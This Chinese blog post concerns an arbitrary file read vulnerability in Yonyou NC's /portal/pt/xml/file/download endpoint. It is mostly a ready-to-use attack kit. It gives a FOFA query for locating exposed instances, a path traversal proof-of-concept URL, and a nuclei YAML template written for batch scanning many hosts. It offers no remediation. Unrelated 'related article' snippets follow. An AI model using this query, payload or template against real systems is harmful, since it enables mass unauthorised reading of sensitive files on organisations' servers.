首页 > 其他分享 >用友NC_download文件读取漏洞

用友NC_download文件读取漏洞

时间:2023-10-14 18:55:18浏览次数:33  
标签:文件 读取 漏洞 NC 用友 download

漏洞简介

用友NC的download文件存在任意文件读取漏洞,攻击者可以利用该漏洞读取服务器上的敏感文件。

漏洞复现

fofa语法:app="用友-UFIDA-NC"

POC:
/portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp

nuclei批量yaml文件

id: yonyouNC_download_fileread
info:
  name: 用友NC_download文件读取
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: word
        part: body
        words:
          - "response.addHeader"

标签:文件,读取,漏洞,NC,用友,download
From: https://www.cnblogs.com/pursue-security/p/17764545.html

相关文章

  • xxx is not in the sudoers file. This incident will be reported
    1、问题背景在使用创建的用户访问超出用户权限的文件时,需要用到sudo命令,如1使用创建的用户编辑/etc/hosts文件,无法操作,详情如下:原因:bigdata用户未在/etc/sudoers文件中做权限设置。2、解决方案在/etc/sudoers中做如下操作:#1、查看文件权限ll/etc/sud......
  • MySQL解决查询语句1111 - Invalid use of group function错误
    是因为mysql查询语句的字段当中有聚合函数,where条件中不能用聚合函数的计算值作为查询条件,否则会出现:>1111-Invaliduseofgroupfunction错误。可以使用having解决。补充:这里主要要清楚where和having的作用以及区别:“WHERE” 是一个约束声明,在查询数据库的结果返回之前对......
  • [ARC116C] Multiple Sequences题解
    思路我们可以很好的想到一种\(O(nm)\)的dp:状态:\(dp_{i,j}\)为搜到第\(i\)个,最后一个数是\(j\)的方案数。转移:\(dp_{i,j}=\displaystyle\sum_{k|j,k\not=j}dp_{i-1,k}\)当然这是会超时的。我们换一种思路,我们先枚举最后一个数,再计算方案数。这有个好处,我们缩小......
  • 达芬奇18.0(DaVinci Resolve)下载与安装教程
    软件介绍:DaVinciResolve是一款视频调色剪辑软件,将剪辑、调色、视觉特效、动态图形和音频后期制作融于同一个软件工具中,采用美观新颖的界面设计,易学易用,能让新手用户快速上手操作,还能提供专业人士需要的强大性能。 安装和使用教程:1.通过文章末尾处下载软件后,选中下载的【达芬奇v18......
  • 五大咨询(IBM|埃森哲|汉得|HP|用友)公司IT规划方法论 P119
    本人从事咨询工作多年,二十年一线数字化规划咨询经验,提供制造业数智化转型规划服务,顶层规划/企业架构/数据治理/数据安全解决方案资料干货.【智能制造数字化咨询】该PPT共119页,由于篇幅有限,以下为部分资料,如需完整原版 方案,点击关注下方。HP、IBM、汉普、埃森哲、用友这五大国内......
  • Educational Codeforces Round 116 (Rated for Div. 2) A. AB Balance
    给一个长为\(n\)的字符串\(s\),只包含\(0\)\(1\)两种字符。定义\(AB(s)\)是\(s\)中出现的\(01\)子串个数,\(BA(s)\)是\(s\)中出现的\(10\)子串个数。在一步操作中,可以选择一个字符进行异或。询问最小的操作次数使得\(AB(s)=BA(s)\)。显然连续的\(11\)或连......
  • Codeforces Round 903 (Div. 3) E. Block Sequence(DP)
    CodeforcesRound903(Div.3)E.BlockSequence思路:设dp[i]为当i~n为完美的最少删除次数dp[n]=1,dp[n+1]=0;从后至前对于dp[i]更新若直接删除当前点,则为dp[i+1]+1若不删除则为min(dp[i+a[i]+1],dp[i]);i+a[i]+1为a[i]不能覆盖的位置#defineintlonglong#define......
  • Deep Learning —— 异步优化器 —— RMSpropAsync —— 异步RMSprop
       ============================================  代码地址:https://github.com/chainer/chainerrl/blob/master/chainerrl/optimizers/rmsprop_async.py defupdate_core_cpu(self,param):grad=param.gradifgradisNone:......
  • 升级Lync Server 2013到Skype for Business 2019(十)
    写在前面在前面几章,我们完成了SkypeforBusiness2019前端服务器,边缘服务器以及新的OOS服务器的创建与配置。从本章开始,我们将介绍如何逐步将LyncServer2013的相关服务切换到SkypeforBusiness2019环境。本章将介绍如何切换OOS服务器。由于新的OOS服务器与旧有的OWA服务器使用......
  • FusionSphere和FusionCompute
    FusionSphere的概念:FusionSphere是业界领先的服务器虚拟化解决方案,FusionSphere解决方案通过在服务器上部署虚拟化软件,使一台物理服务器可以承担多台服务器的工作。通过整合现有的工作负载并利用剩余的服务器以部署新的应用程序和解决方案,实现较高的整合率。FusionCompute的概念:......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99